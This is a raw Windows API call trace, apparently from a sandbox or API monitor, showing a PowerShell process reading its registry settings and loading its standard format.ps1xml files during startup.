	[0351.165] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.166] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.167] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.167] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.168] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x1cc) returned 0x0
	[0351.168] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0x10d29c, lpData=0x0, lpcbData=0x10d298*=0x0 | out: lpType=0x10d29c*=0x1, lpData=0x0, lpcbData=0x10d298*=0x74) returned 0x0
	[0351.168] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0x10d20c, lpData=0x0, lpcbData=0x10d208*=0x0 | out: lpType=0x10d20c*=0x1, lpData=0x0, lpcbData=0x10d208*=0x74) returned 0x0
	[0351.168] CoTaskMemAlloc (cb=0x78) returned 0x3520f0
	[0351.168] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0x10d1dc, lpData=0x3520f0, lpcbData=0x10d1d8*=0x74 | out: lpType=0x10d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d1d8*=0x74) returned 0x0
	[0351.168] CoTaskMemFree (pv=0x3520f0) 
	[0351.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0351.169] SetErrorMode (uMode=0x1) returned 0x1
	[0351.169] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0351.169] SetErrorMode (uMode=0x1) returned 0x1
	[0351.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.170] SetErrorMode (uMode=0x1) returned 0x1
	[0351.170] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0351.170] SetErrorMode (uMode=0x1) returned 0x1
	[0351.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.170] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0351.171] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.171] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0351.171] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.171] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0351.171] SetErrorMode (uMode=0x1) returned 0x1
	[0351.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0351.172] SetErrorMode (uMode=0x1) returned 0x1
	[0351.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0351.173] SetErrorMode (uMode=0x1) returned 0x1
	[0351.173] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0351.173] SetErrorMode (uMode=0x1) returned 0x1
	[0351.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0351.173] SetErrorMode (uMode=0x1) returned 0x1
	[0351.173] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d160 | out: lpFileInformation=0x10d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0351.173] SetErrorMode (uMode=0x1) returned 0x1
	[0351.174] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0351.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.174] CoTaskMemFree (pv=0x1b7a89f0) 
	[0351.451] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0351.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.451] CoTaskMemFree (pv=0x1b7a89f0) 
	[0351.451] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0351.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.451] CoTaskMemFree (pv=0x1b7a89f0) 
	[0351.452] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0351.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.452] CoTaskMemFree (pv=0x1b7a89f0) 
	[0351.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.452] SetErrorMode (uMode=0x1) returned 0x1
	[0351.452] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0351.452] GetFileType (hFile=0x32c) returned 0x1
	[0351.453] SetErrorMode (uMode=0x1) returned 0x1
	[0351.453] GetFileType (hFile=0x32c) returned 0x1
	[0351.453] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.455] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.455] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.456] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.456] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.456] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.456] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x9e2, lpOverlapped=0x0) returned 1
	[0351.457] ReadFile (in: hFile=0x32c, lpBuffer=0x33a1c3a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a1c3a*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.457] ReadFile (in: hFile=0x32c, lpBuffer=0x33a26f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33a26f0*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.457] CloseHandle (hObject=0x32c) returned 1
	[0351.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.457] SetErrorMode (uMode=0x1) returned 0x1
	[0351.457] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0351.457] SetErrorMode (uMode=0x1) returned 0x1
	[0351.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.457] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x32c) returned 0x0
	[0351.458] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0351.458] CoTaskMemAlloc (cb=0x5a) returned 0x3a3ae0
	[0351.458] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3a3ae0, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0351.458] CoTaskMemFree (pv=0x3a3ae0) 
	[0351.458] RegCloseKey (hKey=0x32c) returned 0x0
	[0351.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.466] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa804de9f, Data2=0xad05, Data3=0x4265, Data4=([0]=0xa6, [1]=0xf5, [2]=0x95, [3]=0x4a, [4]=0x10, [5]=0xe1, [6]=0xc6, [7]=0xf0))) returned 0x0
	[0351.481] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x5b07e320, Data2=0x2b3, Data3=0x4575, Data4=([0]=0xa6, [1]=0xc5, [2]=0x5b, [3]=0x89, [4]=0x73, [5]=0x3b, [6]=0x8f, [7]=0x4))) returned 0x0
	[0351.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.482] SetErrorMode (uMode=0x1) returned 0x1
	[0351.482] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0351.483] GetFileType (hFile=0x32c) returned 0x1
	[0351.483] SetErrorMode (uMode=0x1) returned 0x1
	[0351.483] GetFileType (hFile=0x32c) returned 0x1
	[0351.483] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.484] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.484] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.484] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.485] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.485] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0xfb2, lpOverlapped=0x0) returned 1
	[0351.485] ReadFile (in: hFile=0x32c, lpBuffer=0x33cc972, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cc972*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.486] ReadFile (in: hFile=0x32c, lpBuffer=0x33cd258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33cd258*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.486] CloseHandle (hObject=0x32c) returned 1
	[0351.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.486] SetErrorMode (uMode=0x1) returned 0x1
	[0351.486] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0351.486] SetErrorMode (uMode=0x1) returned 0x1
	[0351.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.486] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x32c) returned 0x0
	[0351.736] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0351.737] CoTaskMemAlloc (cb=0x5a) returned 0x3a3a70
	[0351.737] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3a3a70, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0351.737] CoTaskMemFree (pv=0x3a3a70) 
	[0351.737] RegCloseKey (hKey=0x32c) returned 0x0
